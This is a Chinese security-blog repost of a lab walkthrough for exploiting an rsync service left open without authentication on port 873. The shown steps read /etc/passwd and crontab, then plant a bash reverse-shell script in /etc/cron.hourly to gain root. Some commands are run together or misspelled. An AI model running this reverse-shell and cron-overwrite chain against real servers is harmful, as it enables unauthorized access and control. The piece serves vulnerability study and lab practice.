rsync 未授权访问漏洞

admin 2023年11月19日20:02:48评论17 views字数 1217阅读4分3秒阅读模式

漏洞简介

rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。

漏洞复现

编译并运行rsync服务器

docker-compose buiddocker-compose up -d

kali访问

rsync rsync://your-ip:873rsync rsync://192.168.137.145:873/

rsync 未授权访问漏洞

可以看出/src为根目录,我们可以查看其目录下的其他文件

rsync rsync://192.168.137.145:873/src

rsync 未授权访问漏洞

根目录下我们可以进行文件下载

rsync 未授权访问漏洞

发现该passwd文件已经下载如当前目录下

rsync 未授权访问漏洞

这样我们可以看到该靶机的一些账号信息

rsync 未授权访问漏洞

这里我们利用创建一个反弹shell的文件覆盖定时任务的默认文件 进行提权

首先下载该靶机上的定时任务文件,查看cronntab中的计划任务

rsync -av rsync://192.168.137.145:873/src/etc/crontab ./cat crontab

rsync 未授权访问漏洞

这里借助linux默认计划任务调用/etc/cron.hourly,利用rsync连接全覆盖  

话不多说,先将/etc/cron.hourly下载看看

rsync -av rsync://192.168.137.145:873/src/etc/cron.hourly ./

rsync 未授权访问漏洞

接下来就是提权过程:

  1. 创建一个shell文件,写入反弹代码

#!/bin/bashbash -i >& /dev/tcp/192.168.137.145/3344 0>&1

rsync 未授权访问漏洞

  1. 赋予shell文件执行权限   

chmod +x shel
3. 将shell上传至/etc/cron.huorly
rsync 未授权访问漏洞
查看是否被修改

rsync 未授权访问漏洞

很明显被成功修改

rsync 未授权访问漏洞

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!


敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

原文始发于微信公众号(巢安实验室):rsync 未授权访问漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月19日20:02:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   rsync 未授权访问漏洞https://cn-sec.com/archives/2220270.html

发表评论

匿名网友 填写信息